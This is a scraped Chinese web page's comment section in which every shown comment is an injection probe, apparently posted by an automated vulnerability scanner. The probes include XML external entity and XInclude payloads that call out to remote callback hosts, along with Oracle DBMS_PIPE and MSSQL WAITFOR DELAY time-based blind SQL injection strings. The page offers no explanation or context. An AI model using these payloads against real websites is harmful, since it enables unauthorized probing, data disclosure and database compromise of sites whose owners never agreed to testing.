共 287 条评论   相关评论

  •        2020-02-24

    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE body SYSTEM "http://rndofvgtevkig.9b5501a3.bxss.me/"><body><method>test</method></body>

  •        2020-02-24

    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "http://rndxrqxhjnbbm.9b5501a3.axss.xyz/">%xxe]>

  •        2020-02-24

    <xi:include href="http://rndrnejnuummq.9b5501a3.axss.xyz/" parse="text"/>

  •        2020-02-24

    <?xml version="1.0" encoding="utf-8"?><!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN""http://rndhjpmkvughv.9b5501a3.axss.xyz/"><roottag>xxe</roottag>

  •        2020-02-24

    AND 9240=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(120)||CHR(104)||CHR(85),5)-- MxHY

  •        2020-02-24

    % AND 9240=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(120)||CHR(104)||CHR(85),5) AND %=

  •        2020-02-24

    AND 9240=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(120)||CHR(104)||CHR(85),5) AND ndIc=ndIc

  •        2020-02-24

    ) AND 9240=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(120)||CHR(104)||CHR(85),5) AND (geSg=geSg

  •        2020-02-24

    AND 9240=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(120)||CHR(104)||CHR(85),5)

  •        2020-02-24

    ) AND 9240=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(120)||CHR(104)||CHR(85),5) AND (5447=5447

  •        2020-02-24

    WAITFOR DELAY 0:0:5-- FnYF

  •        2020-02-24

    % WAITFOR DELAY 0:0:5 AND %=

  •        2020-02-24

    WAITFOR DELAY 0:0:5 AND QyzT=QyzT

  •        2020-02-24

    ) WAITFOR DELAY 0:0:5 AND (GSJd=GSJd

  •        2020-02-24

    ) WAITFOR DELAY 0:0:5 AND (1546=1546

  •        2020-02-24

    <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [ <!ENTITY xxeent SYSTEM "http://rndlmctdeyrkt.9b5501a3.axss.xyz/">]><xyz>&xxeent</xyz>

287条 < 1 2 3 4 5 6 7 8 9 10 ..15 >